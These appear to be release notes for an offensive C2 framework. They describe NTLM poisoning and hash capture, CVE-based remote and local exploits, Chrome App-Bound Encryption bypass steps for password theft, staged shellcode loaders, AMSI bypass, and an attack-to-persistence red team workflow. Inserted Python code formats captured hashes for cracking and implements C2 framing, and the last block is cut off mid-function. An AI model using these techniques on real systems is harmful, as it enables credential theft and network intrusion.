Version 6.0.0: Network Poisoning, Remote Exploitation, and Native Payloads

SpecterInsight v6.0.0 ships the Inveigh network credential capture module, a new Reach remote exploitation module, browser credential extraction with Chrome App-Bound Encryption bypass, a server-side network intelligence framework, four new LevelUp privilege escalation techniques, a Zig 0.16.0 payload compiler, fourteen new payload pipelines, ten new SpecterScripts, a redesigned PowerShell notebook system with a built-in AD red team notebook, a semantic documentation search system backed by vector embeddings, an SSL C2 transport with binary wire protocol and session registration validation, and a redesigned documentation and pipeline UI. Two targeted bug fixes address PowerShell obfuscation reliability and in-memory PE execution capture.

Inveigh: Network Credential Capture and Spoofing

The Inveigh credential capture framework is now a first-class SpecterInsight module. It runs entirely in-process on the implant and captures NTLMv1/NTLMv2 challenge-response hashes from multiple network protocols simultaneously. No tools are dropped to disk. Listeners and spoofers start and stop independently, and all captured credentials aggregate into an in-process store that survives individual protocol restarts.

Protocol Listeners

Start-InveighListener activates protocol-specific listeners on the target host. Supported protocols:

  • HTTP — NTLM/SPNEGO challenge-response negotiation; captures NTLMv1 and NTLMv2 hashes from browser and application authentication
  • SMB/SMB2 — full protocol implementation with packet-level parsing; captures authentication from file share access and lateral movement activity
  • LDAP — SASL/GSSAPI exchange handling; captures domain authentication triggered by LDAP queries
  • TCP and UDP listener infrastructure shared across all protocol handlers

Network Spoofers

Start-InveighSpoofer activates one or more network poisoners. Each runs independently:

  • LLMNR — Link-Local Multicast Name Resolution poisoner; responds to name resolution failures across the local segment
  • mDNS — Multicast DNS poisoner; effective against macOS and Linux hosts alongside Windows
  • NetBIOS-NS — NetBIOS Name Service poisoner; covers legacy and mixed-OS environments
  • DHCPv6 — DHCPv6 poisoner with ICMPv6 Router Advertisement and DNS Search List options; forces IPv6 WPAD and DNS through the operator’s listener on dual-stack networks
  • DNS — authoritative spoofer for controlled DNS zones

Credential Collection

  • Get-InveighCredential — returns all captured NTLMv1/NTLMv2 hashes from the in-process store
  • Wait-InveighCredential — blocks execution until at least one credential is captured; designed for use in SpecterScripts that need to pause until a hash arrives
  • Get-InveighStatus — reports which listeners and spoofers are active and their packet/capture counts
  • Stop-Inveigh — graceful shutdown of all threads; releases socket bindings
  • Clear-Inveigh — clears the credential store and resets all counters without stopping active listeners

Protocol Stack

The full NTLM and protocol negotiation stack is implemented from scratch with no external dependencies:

  • NTLMv1/NTLMv2 challenge-response with packet-level parsing and hash extraction
  • SPNEGO/GSS-API token negotiation for HTTP and LDAP authentication flows
  • ASN.1 DER encoder/decoder for GSSAPI token construction
  • Packet readers and writers for DNS, LLMNR, mDNS, NetBIOS-NS, DHCPv6, and ICMPv6
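As an added illustration (not code from SpecterInsight or the original Inveigh), this is the parsing step a listener performs once the NTLM exchange completes: take the ServerChallenge from the Type 2 message, the user, domain and NtChallengeResponse from the Type 3 message, and emit the NetNTLMv2 line in the hashcat 5600 layout that the -Hashcat switch produces. The two messages and the client-side response computation are constructed inline so the script runs offline; the NT hash is the well-known hash of the string "password", so the emitted line cracks against any wordlist containing it. Field offsets and the response layout follow MS-NLMP; the 24-byte check is how NTLMv1 responses are told apart from NTLMv2 ones.

```python
"""NTLMv2 capture -> hashcat 5600 line, then a crack-style verification.
Sample Type 2 / Type 3 messages are constructed here, not captured traffic."""
import hmac
import struct

NTLMSSP = b"NTLMSSP\x00"
HEADER_T3 = 64  # AUTHENTICATE_MESSAGE without Version/MIC: payload starts here


def _field(buf: bytes, off: int) -> bytes:
    """Resolve an MS-NLMP (Len, MaxLen, BufferOffset) descriptor to its payload bytes."""
    length, _max, offset = struct.unpack_from("<HHI", buf, off)
    if offset + length > len(buf):
        raise ValueError("field points outside the message")
    return buf[offset:offset + length]


def parse_challenge(type2: bytes) -> bytes:
    """Return the 8-byte ServerChallenge of a CHALLENGE_MESSAGE (fixed at offset 24)."""
    if type2[:8] != NTLMSSP or struct.unpack_from("<I", type2, 8)[0] != 2:
        raise ValueError("not an NTLM Type 2 message")
    return type2[24:32]


def parse_authenticate(type3: bytes) -> dict:
    """Pull user, domain and NtChallengeResponse out of an AUTHENTICATE_MESSAGE."""
    if type3[:8] != NTLMSSP or struct.unpack_from("<I", type3, 8)[0] != 3:
        raise ValueError("not an NTLM Type 3 message")
    nt_resp = _field(type3, 20)
    return {"domain": _field(type3, 28).decode("utf-16le"),
            "user": _field(type3, 36).decode("utf-16le"),
            "version": 2 if len(nt_resp) > 24 else 1,  # 24 bytes = NTLMv1 / ESS
            "nt_proof": nt_resp[:16], "blob": nt_resp[16:]}


def hashcat_5600(type2: bytes, type3: bytes) -> str:
    a = parse_authenticate(type3)
    if a["version"] != 2:
        raise ValueError("NTLMv1 response: use the NetNTLMv1 (mode 5500) format instead")
    return f"{a['user']}::{a['domain']}:{parse_challenge(type2).hex()}:{a['nt_proof'].hex()}:{a['blob'].hex()}"


def verify_5600(line: str, ntowfv2_key: bytes) -> bool:
    """What a cracker does per guess: NTProofStr == HMAC-MD5(NTOWFv2, ServerChallenge || blob)."""
    _user, _, _domain, chal, proof, blob = line.split(":")
    calc = hmac.new(ntowfv2_key, bytes.fromhex(chal) + bytes.fromhex(blob), "md5").digest()
    return hmac.compare_digest(calc, bytes.fromhex(proof))


# --- constructed sample exchange (what the client would have sent) ---
def ntowfv2(nt_hash: bytes, user: str, domain: str) -> bytes:
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"), "md5").digest()


def ntlmv2_response(key: bytes, server_chal: bytes, client_chal: bytes, ts: int, target_info: bytes) -> bytes:
    # "temp": version bytes, zeros, timestamp, client challenge, zeros, AV pairs, zeros
    temp = b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", ts) + client_chal + b"\x00" * 4 + target_info + b"\x00" * 4
    return hmac.new(key, server_chal + temp, "md5").digest() + temp


def build_type2(server_chal: bytes) -> bytes:
    empty = struct.pack("<HHI", 0, 0, 56)  # no TargetName / TargetInfo payload
    return NTLMSSP + struct.pack("<I", 2) + empty + struct.pack("<I", 0) + server_chal + b"\x00" * 8 + empty + b"\x00" * 8


def build_type3(user: str, domain: str, nt_resp: bytes) -> bytes:
    payload, fields = b"", []
    # descriptor order: LmChallengeResponse, NtChallengeResponse, DomainName, UserName, Workstation, SessionKey
    for data in (b"\x00" * 24, nt_resp, domain.encode("utf-16le"), user.encode("utf-16le"),
                 "WS01".encode("utf-16le"), b""):
        fields.append(struct.pack("<HHI", len(data), len(data), HEADER_T3 + len(payload)))
        payload += data
    return NTLMSSP + struct.pack("<I", 3) + b"".join(fields) + struct.pack("<I", 0x00088205) + payload


NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")  # NT hash of "password"
KEY = ntowfv2(NT_HASH, "alice", "CORP")
SERVER_CHAL = bytes.fromhex("0123456789abcdef")
TARGET_INFO = struct.pack("<HH", 2, 8) + "CORP".encode("utf-16le") + struct.pack("<HH", 0, 0)
SAMPLE_TYPE2 = build_type2(SERVER_CHAL)
SAMPLE_TYPE3 = build_type3("alice", "CORP", ntlmv2_response(
    KEY, SERVER_CHAL, bytes.fromhex("fedcba9876543210"), 133000000000000000, TARGET_INFO))

if __name__ == "__main__":
    line = hashcat_5600(SAMPLE_TYPE2, SAMPLE_TYPE3)
    print(line)
    print("verifies with the right key:", verify_5600(line, KEY))
```

The proof is computed over ServerChallenge plus the whole blob, so a capture is only usable if both messages of the same exchange are paired; that is why the in-process store keys responses to the challenge it issued rather than to the source address alone.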

Reach: Remote Exploitation

The Reach module is a new implant-side module for remote code execution against network-adjacent targets. It exposes a unified interface over a set of CVE-based exploitation primitives, each wrapped in a standard check-and-exploit pattern so operators can survey a target before committing to an exploitation attempt.

Cmdlets

  • Get-SupportedExploits — enumerates all exploitation techniques registered in the Reach module and returns their names, CVE identifiers, and a short description of the affected surface
  • Invoke-Reach — runs a selected exploitation technique against a specified target; accepts -Technique, -Target, and technique-specific parameters; returns a result object with CheckPassed, ExploitSucceeded, and output
  • Invoke-ReachRunCommand — runs an arbitrary command on a remote target using the specified technique; convenience wrapper over Invoke-Reach for shell command delivery

Techniques

  • CVE-2022-30190 (Follina) — Microsoft Support Diagnostic Tool (MSDT) remote code execution via specially crafted Office document; exploits the ms-msdt: URI handler to execute arbitrary commands with the privileges of the user who opens the document
  • CVE-2020-0796 (SMBGhost) — SMBv3 compression buffer overflow in srv2.sys; targets Windows 10 1903/1909 and Windows Server 1903/1909 hosts that have not applied the March 2020 patch
  • CVE-2024-38063 — Windows TCP/IP remote code execution; targets the IPv6 stack in unpatched Windows hosts
  • CVE-2025-59287 (WSUS) — exploits a WSUS server accepting untrusted BinaryFormatter-serialized update metadata; delivers a TypeConfuseDelegate deserialization gadget that executes arbitrary commands on the WSUS host; requires the BinaryFormatter gadget pipelines (bf_typecfd_gadget, bf_claimsprincipal_gadget, bf_windowsidentity_gadget) to supply the serialized payload bytes

Browser Credential Extraction

A new Get-BrowserCredentials cmdlet in the Credentials module extracts saved passwords from Chromium-based browsers and Firefox. The implementation handles Chrome 127+ App-Bound Encryption (ABE), which previously blocked in-process extraction from all security contexts below the browser’s own process.

Chrome App-Bound Encryption Bypass

Chrome 127 introduced ABE, where the encryption key is protected by Google’s elevation_service.exe IElevator COM service. The service validates the calling process image path before decrypting, blocking all third-party callers. The bypass works as follows:

  • The implant locates the IElevator COM server by reading the Chrome-installed TypeLib GUID from HKLM\TypeLib; this handles all Chrome channels (Stable, Beta, Dev, Canary) and Edge
  • CoSetProxyBlanket is called with EOAC_DYNAMIC_CLOAKING on the interface proxy; this suppresses the service’s image-path verification by presenting the calling token’s identity rather than the executable path
  • The IElevator.DecryptData() vtable slot is dispatched directly to decrypt the AES-GCM key blob
  • DPAPI is applied as a first pass; IElevator handles the ABE layer; the two steps are tried in both orderings to cover Chrome versions with different key wrapping sequences
  • Stale per-IID HKLM Interface\{IID}\TypeLib registry entries left by Chrome installer updates are detected and corrected before each decryption attempt

Validated against Chrome 148.0.7778.179 with key recovery confirmed. Supports Chrome from system-level sessions by enumerating all user profiles and selecting the appropriate DPAPI scope per profile.

Supported Browsers

  • Chrome, Chrome Beta, Chrome Dev, Chrome Canary
  • Microsoft Edge (Stable, Beta, Dev)
  • Brave
  • Firefox — uses DER-based key parsing (FirefoxDerParser) to extract the NSS key database master key without requiring Firefox to be running; decrypts stored login records from the Firefox profile SQLite database

Extraction from SYSTEM Context

The cmdlet runs from SYSTEM by iterating all user profile directories under C:\Users, locating each browser’s profile and login database, and scoping DPAPI operations to that user’s master keys rather than to the SYSTEM context. No impersonation is required.

Network Intelligence

A server-side intelligence collection and augmentation framework that organizes recon data across sessions into a queryable database. As operators run port scans, process listings, interface enumerations, and credential operations, the framework parses and stores results automatically. No manual aggregation is required between sessions.

Data Collection and Augmentation

NetIntelligenceService receives task output from active sessions and runs a DataAugmentation pipeline over the raw results. Transformation stages extract structured data from unstructured output:

  • Credential extraction from credential-related task output
  • Host discovery from ping sweeps and scan output
  • Network interface enumeration parsing
  • Port scan result parsing with service banner extraction
  • Process and service list parsing

Results are cached server-side and indexed per operator. Discovered data from one session is immediately visible when working in another session against the same target environment.

Network Map

A new Network Map dock window appears in the operator workspace. The map renders discovered hosts as nodes and draws edges between hosts based on observed session activity and lateral movement paths. MAC vendor resolution runs against a 57,000-entry vendor database, annotating hardware with manufacturer information for asset fingerprinting.

Database Schema

Four new tables back the network intelligence system:

  • network_hosts — discovered hosts with IP address, hostname, OS fingerprint, and MAC address
  • network_ports — open ports and service banners keyed per host
  • network_credentials — captured credentials linked to the host they were obtained from
  • network_files — file artifacts indexed by host and originating session

Privilege Escalation: New LevelUp Techniques

Four new CVE implementations have been added to the LevelUp module, along with a new Invoke-LevelUpRunCommand cmdlet for interactive use.

CVE-2024-21447 — Windows Authentication / User Manager LPE

Exploits improper link resolution in the Windows User Manager service to achieve SYSTEM via filesystem redirection. Affects Windows 10, Windows 11, and Windows Server 2022 on systems that have not applied the April 2024 cumulative update. Implementation is 1,420 lines (CVE_2024_21447.cs). Validated on WIN-10-19043-64: CheckPassed=True, ExecuteSucceeded=True.

CVE-2023-36874 — Windows Error Reporting Service LPE

Privilege escalation via Windows Error Reporting service abuse. The technique uses a COM activation chain to achieve elevated execution through WerFault.exe. The 596-line implementation covers the full exploitation path from initial trigger to SYSTEM shell delivery.

CVE-2024-26169 — Windows Error Reporting Elevation of Privilege

Previously a partial stub, this technique has been fully implemented. NativeConstants, NativeMethods, and NativeStructs have been updated with the syscall surface required for the exploitation path.

CVE-2023-28252 — CLFS Privilege Escalation (Zig)

A native exploit targeting the Common Log File System (CLFS) driver OOB write vulnerability, implemented in Zig (CVE_2023_28252.zig, 1,299 lines). The exploit binary is compiled via the bundled Zig 0.16.0 toolchain and has no runtime dependencies. The compiled output feeds through the zig_compile payload pipeline stage.

Invoke-LevelUpRunCommand

A new Invoke-LevelUpRunCommand cmdlet provides interactive access to LevelUp techniques from the operator console and SpecterScripts. Previously, running techniques from PowerShell required calling into the technique factory directly. The cmdlet accepts a technique name and passes arguments through to the technique’s execution path.

SMB Module: EternalBlue and SmbGhost

Two remote exploitation techniques have been added to the SMB module as implant-side cmdlets, targeting unpatched Windows hosts reachable over SMB.

  • Invoke-EternalBlue — exploits CVE-2017-0144, the MS17-010 SMBv1 buffer overflow; targets Windows 7, Windows Server 2008, and earlier hosts that never received the March 2017 MS17-010 security update; executes shellcode in the context of the SMB service (SYSTEM)
  • Invoke-SmbGhost — exploits the SMBv3 compression decompression overflow; targets Windows 10 1903/1909 and Windows Server 1903/1909 hosts without the March 2020 patch; delivers shellcode to the kernel-mode SMB driver for SYSTEM execution

Zig Compiler Integration

Zig 0.16.0 is bundled as a payload compiler for generating self-contained native binaries with no runtime dependencies. Both Windows and Linux host binaries are included alongside the full Zig standard library. The compiler is used directly by the server to produce exploit binaries and custom payloads during pipeline execution.

Bundled Toolchain

  • src/Dependencies/dependencies/zig/zig.exe — Windows x64 host binary
  • src/Dependencies/dependencies/zig/zig — Linux x64 host binary
  • src/Dependencies/dependencies/zig/lib/ — full Zig standard library, identical across platforms; no separate install required

Compile-Zig Cmdlet

Compile-Zig is a PSCmdlet that accepts a string or StringTransformResult via the pipeline and returns byte[] for downstream pipeline stages.

Parameters:

  • -OS — Windows or Linux
  • -Architecture — x86, x86_64, or aarch64
  • -Optimization — Debug, ReleaseSafe, ReleaseFast, or ReleaseSmall
  • -OutputType — Exe or Lib

Example:

$source | Compile-Zig -OS Windows -Architecture x86_64 -Optimization ReleaseSmall

Cross-Compilation

Target triples are constructed from the -OS and -Architecture values (e.g., x86_64-windows-gnu, x86_64-linux-gnu). A Windows server can produce Linux ELF binaries and a Linux server can produce Windows PE binaries with no additional configuration.

Payload Pipelines

Fourteen new payload pipelines have been added. Six are Zig-based native loaders, three are BinaryFormatter deserialization gadgets, four expand the C# payload options, and one produces the PrintNightmare DLL.

Zig Native Loaders

  • zig_compile — compiles a Zig source program to a native EXE or shared library using the bundled Zig 0.16.0 compiler; the base stage consumed by all Zig-based pipelines
  • zig_obfuscate_and_compile — applies source-level obfuscation to Zig code (function shuffle, stack-frame jitter, runtime string encoding, comment removal, optional export renaming) before compiling; produces a native binary with no two builds sharing the same static signatures
  • zig_clr_dll_x64 — per-build obfuscated Zig-native x64 DLL; XOR-encodes the sRDI shellcode implant at compile time and decodes it at runtime before executing it in-memory from DllMain
  • zig_clr_exe_x64 — same as zig_clr_dll_x64 but produces a standalone EXE; useful when a DLL delivery primitive is unavailable
  • zig_clr_staged_dll_x64 — Zig-native x64 DLL staged loader; DllMain downloads the sRDI shellcode from the C2 at runtime over HTTPS and executes it in-memory; nothing is embedded at build time
  • zig_clr_staged_exe_x64 — same as zig_clr_staged_dll_x64 but produces a staged EXE; payload URL resolved at runtime against the configured C2 listener

PrintNightmare DLL

  • print_nightmare_dll — compiles a Windows x64 DLL via the Zig toolchain for use with PrintNightmare (CVE-2021-34527); the DLL reflectively loads the SpecterInsight implant as SYSTEM when invoked by the Print Spooler service via AddPrinterDriverEx

BinaryFormatter Deserialization Gadgets

These pipelines produce serialized .NET gadget payloads for use against deserialization sinks such as WSUS (CVE-2025-59287) and other targets that accept untrusted BinaryFormatter streams.

  • bf_typecfd_gadget — generates a TypeConfuseDelegate BinaryFormatter deserialization gadget; the inner payload is a shell command execution chain; primary gadget for WSUS exploitation via the Reach module
  • bf_claimsprincipal_gadget — generates a ClaimsPrincipal-wrapped BinaryFormatter deserialization gadget with a triple-layer deserialization chain; useful when the outermost deserializer strips or filters simple gadgets
  • bf_windowsidentity_gadget — generates a WindowsIdentity-wrapped BinaryFormatter deserialization gadget with a TypeConfuseDelegate inner payload and a double-deserialization outer layer; targets deserializers that perform type filtering on the outermost object

C# Payload Additions

  • cs_amsi_bypass_code — returns obfuscated AMSI bypass C# source code without compiling it; useful as input to a custom build pipeline or for embedding in another project
  • cs_generic_dotnet_stager — generates a C# stager that downloads a .NET executable from a specified URL and reflectively executes it in-memory; no disk writes
  • cs_load_module — compiles a C# payload that downloads and loads the implant; applies multiple obfuscation passes and embeds an AMSI bypass; output is a compiled EXE or DLL depending on configuration
  • cs_runtimeinstaller_load_module — generates an executable configured for the InstallUtil.exe LOLBin execution path; the payload runs as a custom installer action, bypassing standard execution controls

SpecterScripts

Ten new SpecterScripts have been added. Eight cover the full Inveigh credential capture workflow, and two address privilege escalation survey and exploitation.

Inveigh Scripts

  • Start Inveigh — starts all Inveigh spoofers (LLMNR, mDNS, NBNS, DNS, DHCPv6) and listeners (HTTP, SMB, LDAP) in a single call; the fastest way to stand up full network credential capture on a compromised host
  • Start Inveigh Spoofer — activates one or more name resolution spoofers with configurable target and filter lists; use this when you need spoofer-only operation without listeners
  • Start Inveigh Listener — activates one or more Inveigh protocol listeners (HTTP, SMB, LDAP) independently from the spoofers; useful when the host is already positioned to receive authentication traffic without spoofing
  • Get Inveigh Credentials — retrieves all NTLM hashes and cleartext credentials captured by the running Inveigh session; supports hashcat output format and optional deduplication
  • Wait for Inveigh Credential — blocks until Inveigh has captured a specified number of credentials or a timeout is reached; designed to be used in sequential scripts and notebooks where subsequent steps depend on obtaining a hash before proceeding
  • Stop Inveigh — stops all running Inveigh listeners and spoofers and releases all socket bindings
  • Get Inveigh Status — returns current operational status of all Inveigh listeners and spoofers including packet counts and captured credential counts
  • Clear Inveigh — resets the Inveigh session, releasing listeners and clearing the captured credential store without requiring a module reload

Privilege Escalation Scripts

  • Get Privilege Escalation Vulnerabilities — surveys the target for service misconfiguration and unquoted service path privilege escalation vulnerabilities; returns a structured list of findings with service name, binary path, and exploitability assessment
  • Exploit Privilege Escalation Vulnerabilities — runs the vulnerability survey, then sequentially exploits each finding by deploying the implant binary via the misconfigured service to create an elevated session; stops after the first successful SYSTEM session is established

PowerShell Notebooks

The PowerShell notebook system has been redesigned with a new multi-cell workspace, server-side persistent sessions, and a full suite of AI-callable management cmdlets.

Workspace

The notebook workspace provides a tabbed editor where each open notebook occupies its own tab. A sidebar lists all saved notebooks with real-time search and filter. Notebooks can be created from the sidebar, imported from a JSON file, or exported individually or in bulk. Tab state is preserved across reconnects.

Cell Types

Notebooks support three cell types that can be arranged in any order:

  • Script cells — execute PowerShell against the notebook’s server-side session; output streams (stdout, stderr, verbose, warning) are returned in real time with color coding (errors in red, warnings in amber, informational output in blue); each cell has run, cancel, clear output, and copy output controls; output visibility can be toggled to reduce visual noise after a cell has run
  • Markdown cells — render formatted documentation inline between script cells; each cell toggles between a rendered view and a raw text editor; useful for annotating phases, adding target context, and embedding external references within the notebook
  • Parameter cells — parse a PowerShell param() block and render a form-based input for each parameter; support multiple parameter sets with a set selector; generate variable declarations that get prepended to the session before script cells run; allow operators to fill in parameters without editing PowerShell syntax directly

Server-Side Sessions

Each notebook has a dedicated persistent PowerShell session on the server. State accumulated in one cell (variables, imported modules, loaded assemblies) is available to all subsequent cells without re-declaration. Sessions can be reset to a clean state via the reset command or the Specter-NotebooksResetSession cmdlet. Cell execution has a configurable timeout (default 120 seconds). Output is capped at 10,000 characters per cell to prevent runaway output from filling the workspace.

Built-in Notebook Loading

The server loads built-in notebooks from specter-notebooks.json on startup. Notebooks are identified by a fixed GUID so re-running startup does not create duplicates. The SpecterNotebooksReloadOnStartup configuration flag controls whether built-in notebooks are refreshed on each server start.

Import and Export

Notebooks are serialized to a structured JSON format containing all cells, parameter definitions, and metadata. Individual notebooks and the full notebook collection can be exported from the UI sidebar. Exported notebooks can be shared across operators and imported into any SpecterInsight instance.

Built-in Notebook: AD Red Team — Generic Windows Environment

A production-ready red team notebook covering an end-to-end Windows Active Directory engagement is included as a built-in. It is structured as nine sequential phases (Phase 0 through Phase 8), each containing markdown documentation explaining the objective followed by script cells that execute against the target.

Phase 0 — Configuration defines the shared parameter set: implant build name, C2 callback URL, domain user and password, and the lateral movement target hostname. These values are declared once in a parameter cell and referenced by all subsequent phases.

Phase 1 — Infrastructure Setup creates an implant build via Specter-BuildsCreate, generates a TLS certificate via Specter-CertificatesCreate, and starts an HTTPS listener. At the end of this phase the operator has a functioning C2 ready to receive callbacks.

Phase 2 — Initial Access generates an obfuscated PowerShell one-liner via Specter-PayloadPipelineRun against the ps_command pipeline. The output is the delivery payload for the initial foothold.

Phase 3 — Foothold waits for an implant callback via Specter-SessionsWait, then collects baseline host information: system details, current user context, running processes, local group membership, and network interfaces.

Phase 4 — Privilege Escalation runs the LevelUp vulnerability survey and then sequentially attempts each discovered technique. The phase exits when a SYSTEM session is returned or all techniques are exhausted.

Phase 5 — Post-Exploitation runs from the elevated session: harvests credentials from LSASS, enumerates Active Directory computers and users, and scans the domain subnet for open ports.

Phase 6 — Domain Credential Extraction covers the full credential extraction surface: Kerberoasting, AS-REP Roasting, SAM database dumping, autologin registry extraction, Credential Manager extraction, and LLMNR/NBNS/mDNS poisoning via Inveigh to capture challenge-response hashes from other hosts on the segment.

Phase 7 — Lateral Movement deploys an implant to the configured lateral target using WMI with the harvested domain credentials and waits for the new session to call back.

Phase 8 — Persistence installs a WMI event subscription on the lateral host that re-runs the PowerShell cradle whenever system uptime exceeds a threshold, providing resilient re-entry without scheduler artifacts.

Documentation RAG Search

The server now indexes all operator-facing documentation and exposes it through a semantic search API backed by vector embeddings. Operators and AI agents can search the documentation using natural language queries rather than browsing manually.

Embedding Providers

Three embedding providers are supported and auto-selected based on the server configuration:

  • OpenAI (text-embedding-3-small, 1536-dimensional vectors) — used when an OpenAI API key is configured
  • Ollama (nomic-embed-text, 768-dimensional vectors) — used when a local Ollama instance is reachable
  • Built-in (bge-micro-v2, 384-dimensional vectors) — a local model bundled with the server; always available as a fallback with no external dependencies

Indexing and Storage

Documentation is chunked at 2,000-character boundaries and each chunk is embedded and stored in a new documentation_chunks PostgreSQL table (columns: path, title, content, embedding as real[], chunk index, indexed timestamp). The indexing pipeline is idempotent — re-indexing the same document updates the existing rows rather than creating duplicates. Indexing can be triggered via the POST /documentation/index API endpoint or the Specter-DocumentationSearch cmdlet.

Specter-DocumentationSearch Cmdlet

Specter-DocumentationSearch accepts a natural-language query string and returns the top-K most semantically relevant documentation chunks, ranked by cosine similarity against the query embedding. If no embedding provider is configured, the cmdlet falls back to substring search over the indexed content.
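The indexing and search behaviour described above, as an added Python illustration rather than the server’s own code: fixed-size chunking, an upsert keyed on (path, chunk index) so re-indexing is idempotent, cosine ranking against a query embedding, and the substring fallback when no provider is configured. The hashed bag-of-words embedding is a stand-in for the real OpenAI, Ollama and bge-micro-v2 providers, the in-memory dict stands in for the documentation_chunks table, and the two documents are constructed; the orphan-removal step (dropping rows left over when a document shrinks) is an addition a practitioner would want and is not stated on the page.

```python
"""Documentation RAG: 2000-char chunking, idempotent (path, chunk_index) upsert,
cosine ranking, and a substring fallback when no embedding provider exists."""
import math
import re
import zlib

CHUNK_SIZE = 2000
DIM = 256  # real providers: 1536 (OpenAI), 768 (nomic-embed-text), 384 (bge-micro-v2)


def chunk_text(text: str, size: int = CHUNK_SIZE) -> list:
    return [text[i:i + size] for i in range(0, len(text), size)] or [""]


def toy_embed(text: str, dim: int = DIM) -> list:
    """Deterministic stand-in embedding: CRC32-hashed word counts, L2-normalised."""
    v = [0.0] * dim
    for w in re.findall(r"[a-z0-9]+", text.lower()):
        v[zlib.crc32(w.encode()) % dim] += 1.0
    norm = math.sqrt(sum(x * x for x in v)) or 1.0
    return [x / norm for x in v]


def cosine(a: list, b: list) -> float:
    return sum(x * y for x, y in zip(a, b))  # both vectors are unit length


def index_document(store: dict, path: str, title: str, text: str,
                   embed=toy_embed, size: int = CHUNK_SIZE) -> int:
    """Upsert one row per chunk keyed on (path, chunk_index); delete rows a shorter re-index no longer covers."""
    chunks = chunk_text(text, size)
    for i, content in enumerate(chunks):
        store[(path, i)] = {"path": path, "title": title, "content": content,
                            "embedding": embed(content) if embed else None}
    for key in [k for k in store if k[0] == path and k[1] >= len(chunks)]:
        del store[key]  # stale chunks from an older, longer version of the page
    return len(chunks)


def search(store: dict, query: str, k: int = 3, embed=toy_embed) -> list:
    """Return up to k (score, path, snippet) tuples, best first."""
    if embed is None:  # no provider configured: plain substring match over indexed content
        hits = [r for r in store.values() if query.lower() in r["content"].lower()]
        return [(1.0, r["path"], r["content"][:60]) for r in hits[:k]]
    q = embed(query)
    ranked = sorted(((cosine(q, r["embedding"]), r["path"], r["content"][:60])
                     for r in store.values() if r["embedding"] is not None),
                    key=lambda t: t[0], reverse=True)
    return ranked[:k]


# Constructed corpus: the first page is padded past one chunk boundary on purpose.
DOCS = {
    "inveigh.md": ("Inveigh", "Inveigh captures NTLMv2 challenge-response hashes from LLMNR, mDNS and NBNS poisoning. " * 40),
    "zig.md": ("Compile-Zig", "Compile-Zig builds a target triple such as x86_64-windows-gnu from the OS and architecture parameters."),
}


def build_store(embed=toy_embed) -> dict:
    store = {}
    for path, (title, text) in DOCS.items():
        index_document(store, path, title, text, embed)
    return store


if __name__ == "__main__":
    s = build_store()
    print(len(s), "rows;", search(s, "zig cross compile target triple", k=1))
```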

SSL C2 Transport

RawSslImplantServer is a new C2 listener using raw TLS rather than the HTTP/SignalR transport. It operates independently from the Kestrel HTTPS listener and can run concurrently on a separate port. CompositeImplantServer routes incoming connections to the appropriate transport based on the listener URL scheme: https:// addresses go to the Kestrel HTTP transport; ssl:// addresses go to the raw SSL transport.

Binary Wire Protocol

All communication between the implant and the raw SSL listener uses SslC2Protocol, a length-prefixed binary framing format:

  • Request frame: [1 byte command][4 bytes LE body-length][body]
  • Response frame: [1 byte status][4 bytes LE body-length][body]
  • Status codes: 0x00 = OK, 0x01 = Error
  • Response integrity is verified via an RSA-SHA256 signature frame appended after the response body

Nine command types are defined in the protocol: Register, GetTasks, PostResults, PostErrors, GetBuildSettings, GetModule, GetDownload, PostUpload, and GetPayload. These map 1:1 to the task execution loop operations already defined for the HTTP transport, so session handling, task queuing, and result delivery are identical regardless of transport.

Session Registration Validation

The DispatchRegisterAsync handler in RawSslImplantServer enforces a loopback check on registration requests. If the connecting implant presents a default (unmodified) build identity and its source IP is not a loopback address, the server rejects the registration with a generic "The requested resource could not be found." error and closes the connection. This prevents test implants running against the default build from accidentally registering into a production operator environment. Custom builds bypass the check. Registration for valid builds is delegated to ImplantHandlerService.RegisterAsync, which upserts the session record and prepares the artifact directory.
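The framing and the registration rule from the two sections above, as an added Python illustration that is not the server’s code. Everything the page states is kept (the 1-byte tag plus 4-byte little-endian length, status 0x00/0x01, a signature frame after the response, the nine command names, the loopback check and its generic error text); everything else is an assumption: the byte values of the commands, the signature frame layout as [4-byte LE length][signature], the "<build>|<hostname>" body of a Register request, and the "default" build identity. The signature uses RSA PKCS#1 v1.5 with SHA-256 through the cryptography package when it is installed and an HMAC-SHA256 stand-in otherwise, so the block runs offline either way.

```python
"""Raw SSL C2 framing and the loopback registration check, client and server halves."""
import hmac
import ipaddress
import struct

# The release notes name nine commands but not their codes; 1..9 in listed order is assumed.
CMD = {n: i + 1 for i, n in enumerate(["Register", "GetTasks", "PostResults", "PostErrors",
       "GetBuildSettings", "GetModule", "GetDownload", "PostUpload", "GetPayload"])}
STATUS_OK, STATUS_ERROR = 0x00, 0x01
HDR = struct.Struct("<BI")      # [1 byte command/status][4 bytes LE body-length]
SIG_LEN = struct.Struct("<I")   # assumed signature-frame prefix
GENERIC_DENIAL = b"The requested resource could not be found."
DEFAULT_BUILD_ID = "default"    # assumed identity of an unmodified build


def encode_request(cmd: str, body: bytes) -> bytes:
    return HDR.pack(CMD[cmd], len(body)) + body


def decode_request(buf: bytes):
    if len(buf) < HDR.size:
        raise ValueError("short header")
    cmd, n = HDR.unpack_from(buf)
    if len(buf) != HDR.size + n:  # truncated body or trailing bytes: refuse to guess
        raise ValueError("body length mismatch")
    return cmd, buf[HDR.size:]


def encode_response(status: int, body: bytes, sign) -> bytes:
    frame = HDR.pack(status, len(body)) + body  # sign header+body so the status byte is covered
    sig = sign(frame)
    return frame + SIG_LEN.pack(len(sig)) + sig


def decode_response(buf: bytes, verify):
    status, n = HDR.unpack_from(buf)
    end = HDR.size + n
    (slen,) = SIG_LEN.unpack_from(buf, end)
    sig = buf[end + SIG_LEN.size:end + SIG_LEN.size + slen]
    if len(sig) != slen or not verify(buf[:end], sig):
        raise ValueError("response signature invalid")
    return status, buf[HDR.size:end]


def dispatch_register(body: bytes, peer_ip: str, sessions: dict):
    """A default build may only register from a loopback address; the denial text gives no hint why."""
    build_id, _, host = body.decode().partition("|")
    if build_id == DEFAULT_BUILD_ID and not ipaddress.ip_address(peer_ip).is_loopback:
        return STATUS_ERROR, GENERIC_DENIAL
    sessions[host] = build_id  # upsert the session record
    return STATUS_OK, b"registered"


def make_signer():
    """RSA-PKCS1v15-SHA256 if 'cryptography' is available, otherwise an HMAC-SHA256 stand-in."""
    try:
        from cryptography.exceptions import InvalidSignature
        from cryptography.hazmat.primitives import hashes
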